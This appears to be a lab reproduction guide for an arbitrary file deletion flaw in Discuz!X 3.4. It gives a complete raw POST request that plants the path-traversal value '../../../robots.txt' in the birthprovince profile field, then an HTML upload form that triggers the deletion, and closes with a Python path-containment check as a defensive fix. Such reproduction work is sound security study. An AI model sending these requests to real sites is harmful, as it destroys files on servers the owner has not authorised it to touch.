# 5.8.1 Discuz Arbitrary File Deletion

Affected versions: Discuz!X ≤ 3.4

Vulnerability details: <https://lorexxar.cn/2017/09/30/dz-delete/>

Vulnerability reproduction

Install Discuz X3.4

![](http://ww1.sinaimg.cn/large/0078beR7ly1g2t1338839j30ub0nlq4o.jpg)

After the installation finishes, first visit robots.txt to confirm that the file exists (mine has already been deleted, so this screenshot is borrowed from the web).

[![img](https://github.com/Louisnie/vulhub/raw/master/discuz/x3.4-arbitrary-file-deletion/2.png)](https://github.com/Louisnie/vulhub/blob/master/discuz/x3.4-arbitrary-file-deletion/2.png)

Then register an ordinary user account and find your own formhash on the profile page:

![](http://ww1.sinaimg.cn/large/0078beR7ly1g2t1hol151j31360ry76v.jpg)

Send the following request with your own Cookie and formhash:

```
POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1
Host: 192.168.174.128
Content-Length: 367
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPFvXyxL45f34L12s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie:JSESSIONID=FV4fcRqDD8dnQ6QV2fW2QF7sLWGQR54w9NHs1ND3nvpX42M3dFKy!1896303974; Gyeu_2132_saltkey=KE98Psrp; Gyeu_2132_lastvisit=1557226499; Gyeu_2132_sid=BD3lOL; Gyeu_2132_lastact=1557230363%09home.php%09spacecp; Gyeu_2132_onlineusernum=1; Gyeu_2132_seccode=1.ed6d0543029810d816; Gyeu_2132_ulastactivity=9feaQBwFs5A3KtNxNbXCfi5U8MG5lhcZFxonFJWtIN0wKGLcpFE6; Gyeu_2132_auth=35fdP7M1CDLaPPh3CcHBuLE%2FS5%2Byho%2FBy8kE%2FF3llJTtEYgnGajkeuR3mkozjRnUlaFIHVDva6IRFNRBxDf%2F; Gyeu_2132_home_readfeed=1557230307; Gyeu_2132_noticeTitle=1
Connection: close

------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="formhash"

3d86b691                   // your own formhash goes here
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="birthprovince"

../../../robots.txt                // the stored path, pointing at robots.txt
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="profilesubmit"

1
------WebKitFormBoundaryPFvXyxL45f34L12s--
```

![](http://ww1.sinaimg.cn/large/0078beR7ly1g2t1k0qrkxj30zf0l3acm.jpg)

After the submission succeeds, the birthplace field on the profile edit page shows the state in the figure below:

![](http://ww1.sinaimg.cn/large/0078beR7ly1g2t1lwe9cej30i60co3yg.jpg)

Then build an upload HTML file locally and open it in a browser.

The code is as follows; replace `[your-ip]` with the Discuz hostname and `[form-hash]` with your formhash:

```
<body>
    <form action="http://[your-ip]/home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=[form-hash]" method="post" enctype="multipart/form-data">
        <input type="file" name="birthprovince" />
        <input type="submit" value="upload" />
    </form>
</body>
```

Upload any image:

![](http://ww1.sinaimg.cn/large/0078beR7ly1g2t1unae9lj30p70c4jrd.jpg)

After the upload succeeds, visit robots.txt again: the file has been deleted.

![](http://ww1.sinaimg.cn/large/0078beR7ly1g2t1st7ihlj30qi0gkt9e.jpg)
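The root cause shown above is that a user-controlled profile value (`birthprovince`) is stored unvalidated and later handed to an unguarded `unlink()` when the upload replaces it. The following Python routine is an added defensive illustration, not code from the original write-up or from Discuz itself: it demonstrates the containment check that a "delete the old attachment" step needs, rejecting the `../../../robots.txt` value used in the request above while still removing a legitimate file inside the upload directory. The directory layout, file names and function names are assumptions made for the example.

```python
import os
import tempfile
from pathlib import Path
from typing import Optional

# Constructed example (not Discuz's own code): the upload directory layout and
# the function names below are assumptions made for this illustration.


def resolve_inside(root: Path, name: str) -> Optional[Path]:
    """Return the absolute path of `name` under `root`, or None when the
    stored value must not be deleted (empty, NUL byte, directory components,
    absolute path, or a symlink that resolves outside `root`)."""
    if not name or "\x00" in name:
        return None
    # A stored attachment name should be a bare filename: refuse anything
    # carrying a directory part before touching the filesystem at all.
    if os.path.basename(name) != name:
        return None
    candidate = (root / name).resolve()
    # Containment check performed after symlink resolution on both sides.
    if root.resolve() not in candidate.parents:
        return None
    return candidate


def delete_old_attachment(root: Path, stored_name: str) -> bool:
    """Guarded replacement for an unconditional unlink($old_value): only
    regular files living directly inside `root` are removed.
    Returns True when a file was actually deleted."""
    target = resolve_inside(root, stored_name)
    if target is None or not target.is_file():
        return False
    target.unlink()
    return True


def demo() -> dict:
    """Exercise the guard against constructed inputs in a temporary tree:
    a traversal value (as in the request above), an absolute path, and a
    legitimate attachment name."""
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp)
        upload_root = base / "data" / "attachment" / "profile"  # assumed layout
        upload_root.mkdir(parents=True)
        (upload_root / "avatar_old.jpg").write_bytes(b"\xff\xd8old")
        (base / "robots.txt").write_text("User-agent: *\n")

        results = {}
        # Traversal value like the one submitted as birthprovince above.
        results["traversal_deleted"] = delete_old_attachment(
            upload_root, "../../../robots.txt")
        results["robots_survives"] = (base / "robots.txt").exists()
        # Absolute path is refused as well.
        results["absolute_deleted"] = delete_old_attachment(
            upload_root, str(base / "robots.txt"))
        # A bare filename inside the upload directory is still cleaned up.
        results["legit_deleted"] = delete_old_attachment(
            upload_root, "avatar_old.jpg")
        results["legit_gone"] = not (upload_root / "avatar_old.jpg").exists()
        return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The basename check alone would already stop the payload on this page; the `resolve()`-based containment check is kept so that a symlink planted inside the upload directory cannot redirect the unlink outside it either. The same two checks apply to any field whose stored value is later used as a filesystem path.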
